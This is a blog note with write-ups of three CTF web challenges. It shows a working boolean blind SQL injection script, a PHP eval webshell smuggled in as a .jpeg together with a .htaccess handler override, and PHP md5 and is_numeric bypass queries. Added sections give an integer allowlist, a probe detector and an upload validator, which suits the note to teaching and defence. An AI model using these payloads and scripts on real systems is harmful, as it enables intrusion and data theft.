note-32

[CISCN2019 North China Region Day2 Web1] Hack World

The BUUCTF hint says it is SQL. The page presents a single input box, but it submits by POST, so capture the request:

```http
POST /index.php HTTP/1.1
Host: cb3e0494-3cbe-4dca-b625-ed7bbc363bbe.node5.buuoj.cn:81
Content-Length: 4
Cache-Control: max-age=0
Accept-Language: zh-CN,zh;q=0.9
Origin: http://cb3e0494-3cbe-4dca-b625-ed7bbc363bbe.node5.buuoj.cn:81
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://cb3e0494-3cbe-4dca-b625-ed7bbc363bbe.node5.buuoj.cn:81/index.php
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

id=1
```

So the injection point is `id`. Fuzzing it with Burp shows roughly the following are filtered:

```
(space)
or
||
and
&&
"
;
'xmlupdate()
/**/
`
```

Testing found that the following works:

```
1^(length(database())=2)
```

If the length guess is correct, the page returns:

```
Error Occured When Fetch Result.
```

otherwise it returns:

```
Hello, glzjin wants a girlfriend.
```

That difference is a boolean oracle, so blind injection is possible.
Burp had already established that the database name is 11 characters long.
I took an old script and adapted it:

```python
import requests
import time

# str = "-./0123456789:;<>=?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~#"
url = 'http://69638964-21bc-445d-a323-6de57b0ff6bb.node5.buuoj.cn:81/'
database_name = ''
name = ""

# Positions 10 and 11 of the database name, over printable ASCII.
for i in range(10, 12):
    for l in range(32, 127):
        time.sleep(0.2)
        # 1^(cond): when cond is true the id evaluates to 0 and the page shows the error text
        payload = '1^(ascii(substr(database(),{},1))={})'.format(i, l)
        data = {'id': payload}
        resp = requests.post(url, data)
        print("testing database name position", i, "against character", chr(l))
        if 'Error Occured When Fetch Result.' in resp.text:
            name = name + chr(l)
            print("database name:", name)
            break

# Leftover loops from an earlier challenge (different oracle string and table), kept commented out.
# for i in range(1, l + 1):
#     for s in str:
#         payload = "1&&substr(database(),{},1)='{}'".format(i, s)
#         data = {'id': payload}
#         resp = requests.post(url, data)
#         if 'Nu1L' in resp.text:
#             database_name = database_name + s
#             print("character", i, ": ", database_name)
#             break

# for l in range(1, 1000):
#     time.sleep(0.05)
#     payload = "1&&length((select group_concat(table_name)from sys.x$schema_flattened_keys where table_schema=database()))={} ".format(l)
#     data = {'id': payload}
#     resp = requests.post(url, data)
#     print("table-name length:", l)
#     if 'Nu1L' in resp.text:
#         print("total table-name length:", l)
#         break

# for i in range(1, l + 1):
#     for s in str:
#         time.sleep(0.05)
#         payload = "1&&substr((select group_concat(table_name)from sys.x$schema_flattened_keys where table_schema=database()),{},1)='{}' ".format(i, s)
#         data = {'id': payload}
#         resp = requests.post(url, data)
#         if 'Nu1L' in resp.text:
#             name = name + s
#             print("table names:", name)
#             break

# flag = ''
# for l in range(1, 10000):
#     f = ''
#     for s in range(32, 127):
#         time.sleep(0.08)
#         f = flag + chr(s)
#         payload = '1&&((select 1,"{}")>(select * from f1ag_1s_h3r3_hhhhh))'.format(f)
#         data = {'id': payload}
#         resp = requests.post(url, data)
#         if 'Nu1L' in resp.text:
#             flag = flag + chr(s - 1)
#             print(flag.lower())
#             break
```

First dump the database name:
`ctftraining`
The challenge actually gives the table and column names, so the flag can be dumped directly; why did I dump the database name at all?
Call it a test.

```python
import requests
import time

# str = "-./0123456789:;<>=?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~#"
url = 'http://b74d121d-ae37-46c5-9e40-49750c875c6b.node5.buuoj.cn:81/index.php'
database_name = ''
flag = ""

# Step 1: find the flag length. The loop stops at the first le with length < le,
# so the real length is le - 1.
flag_len = 0
for le in range(1, 100):
    # the select inside length() needs its own extra pair of parentheses
    payload = '1^((length((select(flag)from(flag))))<{})'.format(le)
    data = {'id': payload}
    resp = requests.post(url, data)
    print("testing flag length:", le)
    if 'Error Occured When Fetch Result.' in resp.text:
        flag_len = le - 1
        print("flag length is:", flag_len)
        break

# Step 2: recover the flag one character at a time.
# 32..126 covers every printable ASCII character, including '{' and '}'.
for i in range(1, flag_len + 1):
    for l in range(32, 127):
        time.sleep(0.1)
        payload = '1^((ascii(substr((select(flag)from(flag)),{},1)))={})'.format(i, l)
        data = {'id': payload}
        resp = requests.post(url, data)
        print("flag position", i, "trying", chr(l), ' ', flag)
        if 'Error Occured When Fetch Result.' in resp.text:
            flag = flag + chr(l)
            print("flag:", flag)
            break
```

Maybe I was just groggy last night: I got stuck for an hour and a half, until 3:30 a.m., on the fact that a `select` inside `length()` and `substr()` needs an extra pair of parentheses.
Three and a half hours for one challenge; soul-crushing.
At least I solved it on my own in the end.
flag{e53ac9ec-ab18-44e9-89b4-f1b39d8f813c}
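The filter list and the `1^(...)` probe above show why a keyword blacklist is the wrong control: nothing in that list stops a boolean condition spliced onto a numeric `id`. Below is an added example, written for this note and not part of the original writeup or the challenge, of what a defender would put in place instead: a strict integer allowlist for `id`, and a small detector that counts blind-injection probes per client in access logs. The blacklist tokens are reconstructed from the fuzzing list above (treating the entry `'xmlupdate()` as the single quote plus `updatexml()`); the probe regex, the log-line format, the client addresses and the log lines are all constructed for this example.

```python
import re
from collections import Counter
from urllib.parse import parse_qs

# Tokens the challenge blacklisted, reconstructed from the writeup's Burp fuzzing
# list. Assumption: the entry "'xmlupdate()" stands for the single quote plus
# updatexml(); both are included here.
BLACKLIST = (" ", "or", "||", "and", "&&", '"', ";", "'", "updatexml", "/**/", "`")

# The only shape a legitimate id has: a short decimal integer.
ID_RE = re.compile(r"[0-9]{1,10}")

# Markers of boolean-based blind probing: SQL functions used to read one
# character at a time, or the ^ operator used to splice a condition onto
# a numeric id. Constructed for this example.
PROBE_RE = re.compile(r"\b(length|substr|substring|ascii|ord|database|select)\s*\(|\^", re.I)


def passes_blacklist(value: str) -> bool:
    """The challenge-style control: reject only if a blacklisted token occurs."""
    lowered = value.lower()
    return not any(tok in lowered for tok in BLACKLIST)


def is_valid_id(value: str) -> bool:
    """The replacement control: accept only a plain decimal integer."""
    return ID_RE.fullmatch(value) is not None


def classify_id(value: str) -> str:
    """Label one id value: 'ok', 'probe' (blind-injection signature) or 'rejected'."""
    if is_valid_id(value):
        return "ok"
    if PROBE_RE.search(value):
        return "probe"
    return "rejected"


def probes_per_client(log_lines):
    """Count blind-injection probes per client over constructed access-log lines.

    Line format (constructed for this example): '<client-ip> POST <path> "<form-body>"'.
    Character-by-character extraction needs one request per candidate byte, so a
    client doing it shows up with a large, steadily growing probe count.
    """
    counts = Counter()
    for line in log_lines:
        try:
            head, body = line.split(' "', 1)
        except ValueError:
            continue  # not in the expected format; skip
        client = head.split()[0]
        params = parse_qs(body.rstrip('"'))
        for value in params.get("id", []):
            if classify_id(value) == "probe":
                counts[client] += 1
    return dict(counts)


# Constructed sample traffic mirroring the probes in the writeup.
SAMPLE_LOG = [
    '198.51.100.7 POST /index.php "id=1"',
    '198.51.100.7 POST /index.php "id=1^(length(database())=2)"',
    '198.51.100.7 POST /index.php "id=1^(ascii(substr(database(),1,1))=99)"',
    '198.51.100.7 POST /index.php "id=1^(ascii(substr(database(),1,1))=100)"',
    '203.0.113.9 POST /index.php "id=2"',
]

if __name__ == "__main__":
    probe = "1^(length(database())=2)"
    print("blacklist lets the probe through:", passes_blacklist(probe))
    print("integer allowlist rejects it:", not is_valid_id(probe))
    print("probes per client:", probes_per_client(SAMPLE_LOG))
```

The per-client probe count is the practical detection signal: recovering one character costs up to 95 near-identical requests, so the volume stands out even when each individual request looks harmless. The fix on the application side is to validate `id` as an integer and bind it as a parameter of a prepared statement, so the database never parses attacker-controlled text at all.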

[GXYCTF2019]BabyUpload

First, try uploading a webshell and see what happens:

Uploading a PHP webshell returns:

```
后缀名不能有ph!
```

(the extension must not contain "ph"). Uploading a normal PNG file returns:

```
上传类型也太露骨了吧!
```

(the upload type is too obvious). A JPG gets the same response:

```
上传类型也太露骨了吧!
```

Never mind; capture the request in Burp and modify it:

```http
Content-Disposition: form-data; name="uploaded"; filename="shell.jpeg"
Content-Type: image/jpeg

<script language='php'>@eval($_POST[zhong]);</script>
<script language='php'>system('cat /flag');</script>
```

Success:

```
/var/www/html/upload/407deea951641fdc86613277efecd816/shell.jpeg succesfully uploaded!
```

The file is reachable in the browser, but AntSword cannot connect; presumably the upload directory is not configured to parse PHP.
The server is Apache,
so the next thing to try is a .htaccess file:

```http
Content-Disposition: form-data; name="uploaded"; filename=".htaccess"
Content-Type: image/jpeg

SetHandler application/x-httpd-php
```

```
/var/www/html/upload/407deea951641fdc86613277efecd816/.htaccess succesfully uploaded!
```

AntSword connects, and the flag is in the root directory.
When I first saw that path I assumed it was some kind of random directory.

I also took the chance to try putting the webshell directly inside the .htaccess file; that could not connect, so it probably does not work.
Doing this inside the upload directory also broke the environment.
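The three uploads above (`shell.jpeg` with PHP inside, a `.htaccess` that switches the handler, and a server check that looks only at the extension string) map directly onto the checks an upload handler should make. The following is an added example, written for this note and not code from the challenge or the original writeup, of such a validator in Python: an allowlist on the final extension, no dotfiles, a file name restricted to safe characters, the declared Content-Type matched against the extension, image magic bytes matched against the declared type, and a scan for script markup inside the image data. The allowlist, the magic-byte table, the marker list and the sample inputs are this example's own.

```python
import os
import re

# Extensions this handler is willing to store. Example policy, not the challenge's.
ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}

# Leading bytes each image type must start with (standard file signatures).
MAGIC = {
    "jpeg": b"\xff\xd8\xff",
    "jpg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}

# Byte sequences that have no business inside an image file.
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script")

# File name stem: letters, digits, underscore, hyphen only. No dots, so
# double extensions such as shell.php.jpeg are rejected as well.
SAFE_NAME_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")


def expected_content_type(ext: str) -> str:
    """Map an allowed extension to the single Content-Type it may be declared as."""
    return "image/jpeg" if ext in ("jpg", "jpeg") else "image/" + ext


def validate_upload(filename: str, content_type: str, data: bytes):
    """Return (accepted, reason) for one multipart file part."""
    base = os.path.basename(filename.replace("\\", "/"))
    if base.startswith("."):
        return False, "dotfiles such as .htaccess are not accepted"
    stem, dot, ext = base.rpartition(".")
    ext = ext.lower()
    if not dot or ext not in ALLOWED_EXT:
        return False, "extension not in allowlist"
    if not SAFE_NAME_RE.fullmatch(stem):
        return False, "unsafe characters in file name"
    if content_type != expected_content_type(ext):
        return False, "Content-Type does not match extension"
    if not data.startswith(MAGIC[ext]):
        return False, "file header does not match declared image type"
    if any(marker in data for marker in SCRIPT_MARKERS):
        return False, "script markup found inside image data"
    return True, "ok"


if __name__ == "__main__":
    # Constructed inputs mirroring the writeup's uploads plus a genuine PNG header.
    cases = [
        ("shell.jpeg", "image/jpeg", b"<script language='php'>echo 1;</script>"),
        (".htaccess", "image/jpeg", b"SetHandler application/x-httpd-php"),
        ("shell.php", "image/jpeg", b"\xff\xd8\xff\xe0"),
        ("photo.png", "image/png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16),
    ]
    for name, ctype, body in cases:
        print(name, "->", validate_upload(name, ctype, body))
```

Each of the writeup's uploads fails a different check here: `shell.jpeg` has a matching extension and Content-Type but no JPEG header; `.htaccess` is a dotfile; a renamed `shell.php` never reaches the content checks. The validator is only one layer: the upload directory should also be served with Apache's `AllowOverride None`, so that a stray `.htaccess` is ignored, and with no PHP handler mapped, so that a file the validator misses still cannot execute.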

[MRCTF2020]Ez_bypass

Opening the challenge:

The page says "I put something in F12 for you", and the source is:

```php
include 'flag.php';
$flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}';
if(isset($_GET['gg'])&&isset($_GET['id'])) {
    $id=$_GET['id'];
    $gg=$_GET['gg'];
    if (md5($id) === md5($gg) && $id !== $gg) { // md5 bypass: the two values must differ but their md5 hashes must be equal
        echo 'You got the first step';
        if(isset($_POST['passwd'])) {
            $passwd=$_POST['passwd'];
            if (!is_numeric($passwd))
            {
                if($passwd==1234567)
                {
                    echo 'Good Job!';
                    highlight_file('flag.php');
                    die('By Retr_0');
                }
                else
                {
                    echo "can you think twice??";
                }
            }
            else{
                echo 'You can not get it !';
            }

        }
        else{
            die('only one way to get the flag');
        }
    }
    else {
        echo "You are not a real hacker!";
    }
}
else{
    die('Please input first');
}
}
```

The page itself shows `Please input first`.

First, try the array bypass:

```
?id[]=0&gg[]=1
```

Response: `You got the first steponly one way to get the flag`

Then add POST data:

```
?id[]=0&gg[]=1

passwd=1234567
```

Response: `You got the first stepYou can not get it !`

Now is_numeric has to be bypassed. The line in the source,
`if (!is_numeric($passwd))`,
means the password must not be purely numeric.
So passwd=1234567aa
gets the flag.

PHP comparison bypass of is_numeric()

When PHP compares a string with an integer using ==, it converts the string to an integer,
so
1234567aa becomes 1234567
and the comparison succeeds.


note-32, by aidemofashi, published 1 May 2025: https://aidemofashi.github.io/2025/05/01/note-32/